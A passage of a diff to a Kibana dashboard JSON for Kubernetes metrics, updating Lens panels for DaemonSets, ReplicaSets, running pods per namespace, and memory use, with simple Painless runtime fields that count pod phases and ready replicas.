"e36fb66d-f9b0-46d3-aec4-52638d34d308", - "xAccessor": "5b89a3a0-f94e-49c2-bc43-fdd4c7671ea5", - "yConfig": [ - { - "color": "#bd271e", - "forAccessor": "05b6d6a0-0ed8-4f14-a3e4-68071b01b03c" - }, - { - "color": "#00bfb3", - "forAccessor": "0e2a3f8d-cc26-453d-bed1-b184e48756b2" - } - ] - } - ], - "legend": { - "isVisible": false, - "position": "bottom", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "show", - "valuesInLegend": true, - "xTitle": "", - "yTitle": "" - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 100000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.container.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "21cde57c-0e69-4e4c-b3e9-659de2778d06", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.container", + "kubernetes.state_node" + ], + "type": "phrases", + "value": [ + "kubernetes.container", + "kubernetes.state_node" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.container" + } }, - "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": { - "dynamicActions": { - "events": [] + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_node" + } } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0.5, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "307be273-94a6-41ab-b93b-0debde733492" + ], + "collapseFn": "sum", + "layerId": "dff09473-7596-48c7-bbf4-beccee70d845", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "area", + "splitAccessor": "6677e92c-5874-49c1-979e-c16c0d3838cd", + "xAccessor": "46082fb5-9abc-42a0-8e4d-8a8d40a66ddf", + "yConfig": [ + { + "axisMode": "left", + "color": "#00bfb3", + "forAccessor": "307be273-94a6-41ab-b93b-0debde733492" + } + ] + }, + { + "accessors": [ + "62125b6d-3199-420b-9d3b-46f159e15d7f" + ], + "collapseFn": "sum", + "layerId": "dfd1702f-213e-4fa2-98e3-5106657c62e7", + "layerType": "data", + "palette": { + "name": "negative", + "type": "palette" }, - "hidePanelTitles": false - }, - "gridData": { - "h": 6, - "i": "a45792c9-1600-4632-bf8e-a0a0984d82d9", - "w": 10, - "x": 28, - "y": 13 - }, - "panelIndex": "a45792c9-1600-4632-bf8e-a0a0984d82d9", - "title": "DaemonSets", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "seriesType": "line", + "splitAccessor": "f0953a4e-8498-4b22-a63a-d24e4a069ed3", + "xAccessor": "5c33dcdb-21de-4bdc-b564-ba82ed037d11", + "yConfig": [ + { + "axisMode": "left", + "color": "#bd271e", + "forAccessor": "62125b6d-3199-420b-9d3b-46f159e15d7f" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "top", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "xTitle": "", + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [], - "state": { - "adHocDataViews": { - "0fa53a1e-0589-4380-b700-70dd489a33de": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "0fa53a1e-0589-4380-b700-70dd489a33de", - "name": "state-pods-adhoc", - "runtimeFieldMap": { - "failed": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "not_running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "pending": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" - }, - "type": "long" - }, - "running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" - }, - "type": "long" - }, - "succeeded": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "dbfaeb6f-4fff-4043-8bf8-19d5345fd339": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "dbfaeb6f-4fff-4043-8bf8-19d5345fd339", - "name": "state_replicaset_ad-hoc", - "runtimeFieldMap": { - "not_ready": { - "script": { - "source": "def ready = doc['kubernetes.replicaset.replicas.ready'].value;\ndef des = doc['kubernetes.replicaset.replicas.desired'].value;\nemit(des-ready)" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - }, - "f8fa576a-6f91-4a11-a43d-7f3964869d7d": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "f8fa576a-6f91-4a11-a43d-7f3964869d7d", - "name": "daemonsets-ad-hoc", - "runtimeFieldMap": {}, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - } - }, - "datasourceStates": { - "formBased": { - "layers": { - "b7b25285-ced1-481d-999e-1886b3463594": { - "columnOrder": [ - "fcc76997-5b49-416b-81ba-37d65ea25296", - "446fc0b3-a6c8-4f4d-914b-748d488083a1", - "a51a9822-167b-4b8f-b7a6-3051da30164b", - "e8f5e7ee-1dc9-46e8-b43a-18f7a358d920" - ], - "columns": { - "446fc0b3-a6c8-4f4d-914b-748d488083a1": { - "dataType": "string", - "isBucketed": true, - "label": "Filters", - "operationType": "filters", - "params": { - "filters": [ - { - "input": { - "language": "kuery", - "query": "" - }, - "label": "Status" - } - ] - }, - "scale": "ordinal" - }, - "a51a9822-167b-4b8f-b7a6-3051da30164b": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.replicaset.replicas.ready: *" - }, - "isBucketed": false, - "label": "Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "reducedTimeRange": "1m", - "scale": "ratio", - "sourceField": "kubernetes.replicaset.replicas.ready" - }, - "e8f5e7ee-1dc9-46e8-b43a-18f7a358d920": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "not_ready: *" - }, - "isBucketed": false, - "label": "Not Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "not_ready" - }, - "fcc76997-5b49-416b-81ba-37d65ea25296": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.replicaset.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderBy": { - "columnId": "a51a9822-167b-4b8f-b7a6-3051da30164b", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.replicaset.name" - } - }, - "incompleteColumns": {} - } - } - } - }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Memory used vs total memory" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "a45792c9-1600-4632-bf8e-a0a0984d82d9", + "w": 10, + "x": 28, + "y": 13 + }, + "panelIndex": "a45792c9-1600-4632-bf8e-a0a0984d82d9", + "embeddableConfig": { + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "0fa53a1e-0589-4380-b700-70dd489a33de": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "0fa53a1e-0589-4380-b700-70dd489a33de", + "name": "state-pods-adhoc", + "runtimeFieldMap": { + "failed": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "not_running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "pending": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" + }, + "type": "long" + }, + "running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" + }, + "type": "long" + }, + "succeeded": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "295ecdc5-f413-4f20-9f77-74927a10d33d": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "295ecdc5-f413-4f20-9f77-74927a10d33d", + "name": "state_daemonset-ad-hoc", + "runtimeFieldMap": { + "not_ready": { + "script": { + "source": "if (doc[\"kubernetes.daemonset.replicas.desired\"].value - doc[\"kubernetes.daemonset.replicas.ready\"].value != 0) {emit(1)}" + }, + "type": "long" + }, + "ready": { + "script": { + "source": "if (doc[\"kubernetes.daemonset.replicas.desired\"].value - doc[\"kubernetes.daemonset.replicas.ready\"].value == 0) {emit(1)}" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "f8fa576a-6f91-4a11-a43d-7f3964869d7d": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "f8fa576a-6f91-4a11-a43d-7f3964869d7d", + "name": "daemonsets-ad-hoc", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + } + }, + "datasourceStates": { + "formBased": { + "layers": { + "b7b25285-ced1-481d-999e-1886b3463594": { + "columnOrder": [ + "e36fb66d-f9b0-46d3-aec4-52638d34d308", + "5b89a3a0-f94e-49c2-bc43-fdd4c7671ea5", + "0e2a3f8d-cc26-453d-bed1-b184e48756b2", + "05b6d6a0-0ed8-4f14-a3e4-68071b01b03c" + ], + "columns": { + "05b6d6a0-0ed8-4f14-a3e4-68071b01b03c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "not_ready: *" + }, + "isBucketed": false, + "label": "Not Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "not_ready" + }, + "0e2a3f8d-cc26-453d-bed1-b184e48756b2": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "ready: *" + }, + "isBucketed": false, + "label": "Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "ready" + }, + "5b89a3a0-f94e-49c2-bc43-fdd4c7671ea5": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "dbfaeb6f-4fff-4043-8bf8-19d5345fd339", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_replicaset" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_replicaset" - } - } - } - ], - "internalReferences": [ - { - "id": "dbfaeb6f-4fff-4043-8bf8-19d5345fd339", - "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", - "type": "index-pattern" - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "a51a9822-167b-4b8f-b7a6-3051da30164b", - "e8f5e7ee-1dc9-46e8-b43a-18f7a358d920" - ], - "collapseFn": "sum", - "layerId": "b7b25285-ced1-481d-999e-1886b3463594", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "splitAccessor": "fcc76997-5b49-416b-81ba-37d65ea25296", - "xAccessor": "446fc0b3-a6c8-4f4d-914b-748d488083a1", - "yConfig": [ - { - "color": "#bd271e", - "forAccessor": "e8f5e7ee-1dc9-46e8-b43a-18f7a358d920" - }, - { - "color": "#00bfb3", - "forAccessor": "a51a9822-167b-4b8f-b7a6-3051da30164b" - } - ] - } - ], - "legend": { - "isVisible": false, - "position": "right", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "show", - "xTitle": "", - "yTitle": "" - } + { + "input": { + "language": "kuery", + "query": "" + }, + "label": "Status" + } + ] + }, + "scale": "ordinal" }, - "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": { - "dynamicActions": { - "events": [] + "e36fb66d-f9b0-46d3-aec4-52638d34d308": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.daemonset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "0e2a3f8d-cc26-453d-bed1-b184e48756b2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.daemonset.name" } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "295ecdc5-f413-4f20-9f77-74927a10d33d", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_daemonset" }, - "hidePanelTitles": false - }, - "gridData": { - "h": 6, - "i": "eb118cf7-b033-4bcf-acdf-dab0b5da73e7", - "w": 10, - "x": 38, - "y": 13 - }, - "panelIndex": "eb118cf7-b033-4bcf-acdf-dab0b5da73e7", - "title": "ReplicaSets", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_daemonset" + } + } + } + ], + "internalReferences": [ + { + "id": "295ecdc5-f413-4f20-9f77-74927a10d33d", + "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", + "type": "index-pattern" + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "0e2a3f8d-cc26-453d-bed1-b184e48756b2", + "05b6d6a0-0ed8-4f14-a3e4-68071b01b03c" + ], + "collapseFn": "sum", + "layerId": "b7b25285-ced1-481d-999e-1886b3463594", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "splitAccessor": "e36fb66d-f9b0-46d3-aec4-52638d34d308", + "xAccessor": "5b89a3a0-f94e-49c2-bc43-fdd4c7671ea5", + "yConfig": [ + { + "color": "#bd271e", + "forAccessor": "05b6d6a0-0ed8-4f14-a3e4-68071b01b03c" + }, + { + "color": "#00bfb3", + "forAccessor": "0e2a3f8d-cc26-453d-bed1-b184e48756b2" + } + ] + } + ], + "legend": { + "isVisible": false, + "position": "bottom", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "show", + "valuesInLegend": true, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-2ca9773d-0221-478b-b8bc-90bb8d439f33", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5c81359c-376d-41bd-984d-60fb106f2e33", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "2ca9773d-0221-478b-b8bc-90bb8d439f33": { - "columnOrder": [ - "76e50af3-9df6-42c7-9b0e-eea21ab3650f", - "1a2ebd5d-82b1-4cf8-a934-152a5726a82f", - "0f308b41-fbc2-41aa-beef-ba6412224944" - ], - "columns": { - "0f308b41-fbc2-41aa-beef-ba6412224944": { - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.status.phase : \"running\" " - }, - "isBucketed": false, - "label": "Unique count of kubernetes.pod.name", - "operationType": "unique_count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.name" - }, - "1a2ebd5d-82b1-4cf8-a934-152a5726a82f": { - "dataType": "string", - "isBucketed": true, - "label": "Filters", - "operationType": "filters", - "params": { - "filters": [ - { - "input": { - "language": "kuery", - "query": "" - }, - "label": "Pods per Namespace" - } - ] - }, - "scale": "ordinal" - }, - "76e50af3-9df6-42c7-9b0e-eea21ab3650f": { - "dataType": "string", - "isBucketed": true, - "label": "Top 5 values of kubernetes.namespace", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "0f308b41-fbc2-41aa-beef-ba6412224944", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "kubernetes.namespace" - } - }, - "incompleteColumns": {} - } - } - } - }, + "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": { + "dynamicActions": { + "events": [] + } + }, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "DaemonSets" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "eb118cf7-b033-4bcf-acdf-dab0b5da73e7", + "w": 10, + "x": 38, + "y": 13 + }, + "panelIndex": "eb118cf7-b033-4bcf-acdf-dab0b5da73e7", + "embeddableConfig": { + "attributes": { + "references": [], + "state": { + "adHocDataViews": { + "0fa53a1e-0589-4380-b700-70dd489a33de": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "0fa53a1e-0589-4380-b700-70dd489a33de", + "name": "state-pods-adhoc", + "runtimeFieldMap": { + "failed": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "not_running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" + }, + "type": "long" + }, + "pending": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" + }, + "type": "long" + }, + "running": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" + }, + "type": "long" + }, + "succeeded": { + "script": { + "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "dbfaeb6f-4fff-4043-8bf8-19d5345fd339": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "dbfaeb6f-4fff-4043-8bf8-19d5345fd339", + "name": "state_replicaset_ad-hoc", + "runtimeFieldMap": { + "not_ready": { + "script": { + "source": "def ready = doc['kubernetes.replicaset.replicas.ready'].value;\ndef des = doc['kubernetes.replicaset.replicas.desired'].value;\nemit(des-ready)" + }, + "type": "long" + } + }, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + }, + "f8fa576a-6f91-4a11-a43d-7f3964869d7d": { + "allowNoIndex": false, + "fieldAttrs": {}, + "fieldFormats": {}, + "id": "f8fa576a-6f91-4a11-a43d-7f3964869d7d", + "name": "daemonsets-ad-hoc", + "runtimeFieldMap": {}, + "sourceFilters": [], + "timeFieldName": "@timestamp", + "title": "metrics-*,*:metrics-*" + } + }, + "datasourceStates": { + "formBased": { + "layers": { + "b7b25285-ced1-481d-999e-1886b3463594": { + "columnOrder": [ + "fcc76997-5b49-416b-81ba-37d65ea25296", + "446fc0b3-a6c8-4f4d-914b-748d488083a1", + "a51a9822-167b-4b8f-b7a6-3051da30164b", + "e8f5e7ee-1dc9-46e8-b43a-18f7a358d920" + ], + "columns": { + "446fc0b3-a6c8-4f4d-914b-748d488083a1": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "5c81359c-376d-41bd-984d-60fb106f2e33", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "0f308b41-fbc2-41aa-beef-ba6412224944" - ], - "layerId": "2ca9773d-0221-478b-b8bc-90bb8d439f33", - "layerType": "data", - "palette": { - "name": "status", - "type": "palette" - }, - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "splitAccessor": "76e50af3-9df6-42c7-9b0e-eea21ab3650f", - "xAccessor": "1a2ebd5d-82b1-4cf8-a934-152a5726a82f" - } - ], - "legend": { - "isVisible": false, - "position": "right", - "showSingleSeries": false - }, - "preferredSeriesType": "bar_horizontal", - "tickLabelsVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "title": "Empty XY chart", - "valueLabels": "show", - "xTitle": "", - "yTitle": "" - } + { + "input": { + "language": "kuery", + "query": "" + }, + "label": "Status" + } + ] + }, + "scale": "ordinal" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "a51a9822-167b-4b8f-b7a6-3051da30164b": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.replicaset.replicas.ready: *" + }, + "isBucketed": false, + "label": "Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "reducedTimeRange": "1m", + "scale": "ratio", + "sourceField": "kubernetes.replicaset.replicas.ready" + }, + "e8f5e7ee-1dc9-46e8-b43a-18f7a358d920": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "not_ready: *" + }, + "isBucketed": false, + "label": "Not Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "not_ready" + }, + "fcc76997-5b49-416b-81ba-37d65ea25296": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.replicaset.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "a51a9822-167b-4b8f-b7a6-3051da30164b", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.replicaset.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "dbfaeb6f-4fff-4043-8bf8-19d5345fd339", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_replicaset" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 6, - "i": "64dd7c4e-b503-4cc4-8c61-e17c52204b54", - "w": 9, - "x": 0, - "y": 13 - }, - "panelIndex": "64dd7c4e-b503-4cc4-8c61-e17c52204b54", - "title": "Running pods per namespace", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_replicaset" + } + } + } + ], + "internalReferences": [ + { + "id": "dbfaeb6f-4fff-4043-8bf8-19d5345fd339", + "name": "indexpattern-datasource-layer-b7b25285-ced1-481d-999e-1886b3463594", + "type": "index-pattern" + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "a51a9822-167b-4b8f-b7a6-3051da30164b", + "e8f5e7ee-1dc9-46e8-b43a-18f7a358d920" + ], + "collapseFn": "sum", + "layerId": "b7b25285-ced1-481d-999e-1886b3463594", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "splitAccessor": "fcc76997-5b49-416b-81ba-37d65ea25296", + "xAccessor": "446fc0b3-a6c8-4f4d-914b-748d488083a1", + "yConfig": [ + { + "color": "#bd271e", + "forAccessor": "e8f5e7ee-1dc9-46e8-b43a-18f7a358d920" + }, + { + "color": "#00bfb3", + "forAccessor": "a51a9822-167b-4b8f-b7a6-3051da30164b" + } + ] + } + ], + "legend": { + "isVisible": false, + "position": "right", + "showSingleSeries": false + }, + "preferredSeriesType": "bar_horizontal", + "tickLabelsVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "show", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [], - "state": { - "adHocDataViews": { - "0fa53a1e-0589-4380-b700-70dd489a33de": { - "allowNoIndex": false, - "fieldAttrs": {}, - "fieldFormats": {}, - "id": "0fa53a1e-0589-4380-b700-70dd489a33de", - "name": "state-pods-adhoc", - "runtimeFieldMap": { - "failed": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "not_running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\" || doc['kubernetes.pod.status.phase'].value == \"failed\") { emit(1) }" - }, - "type": "long" - }, - "pending": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"pending\") { emit(1) }" - }, - "type": "long" - }, - "running": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"running\") { emit(1) }" - }, - "type": "long" - }, - "succeeded": { - "script": { - "source": "if (doc['kubernetes.pod.status.phase'].value == \"succeeded\") { emit(1) }" - }, - "type": "long" - } - }, - "sourceFilters": [], - "timeFieldName": "@timestamp", - "title": "metrics-*,*:metrics-*" - } + "title": "Total Pods per Namespace [Metrics Kubernetes] (copy 1)", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": { + "dynamicActions": { + "events": [] + } + }, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "ReplicaSets" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "64dd7c4e-b503-4cc4-8c61-e17c52204b54", + "w": 9, + "x": 0, + "y": 13 + }, + "panelIndex": "64dd7c4e-b503-4cc4-8c61-e17c52204b54", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-2ca9773d-0221-478b-b8bc-90bb8d439f33", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5c81359c-376d-41bd-984d-60fb106f2e33", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "2ca9773d-0221-478b-b8bc-90bb8d439f33": { + "columnOrder": [ + "76e50af3-9df6-42c7-9b0e-eea21ab3650f", + "1a2ebd5d-82b1-4cf8-a934-152a5726a82f", + "0f308b41-fbc2-41aa-beef-ba6412224944" + ], + "columns": { + "0f308b41-fbc2-41aa-beef-ba6412224944": { + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.status.phase : \"running\" " + }, + "isBucketed": false, + "label": "Unique count of kubernetes.pod.name", + "operationType": "unique_count", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.name" + }, + "1a2ebd5d-82b1-4cf8-a934-152a5726a82f": { + "dataType": "string", + "isBucketed": true, + "label": "Filters", + "operationType": "filters", + "params": { + "filters": [ + { + "input": { + "language": "kuery", + "query": "" + }, + "label": "Pods per Namespace" + } + ] + }, + "scale": "ordinal" + }, + "76e50af3-9df6-42c7-9b0e-eea21ab3650f": { + "dataType": "string", + "isBucketed": true, + "label": "Top 5 values of kubernetes.namespace", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "0f308b41-fbc2-41aa-beef-ba6412224944", + "type": "column" }, - "datasourceStates": { - "formBased": { - "layers": { - 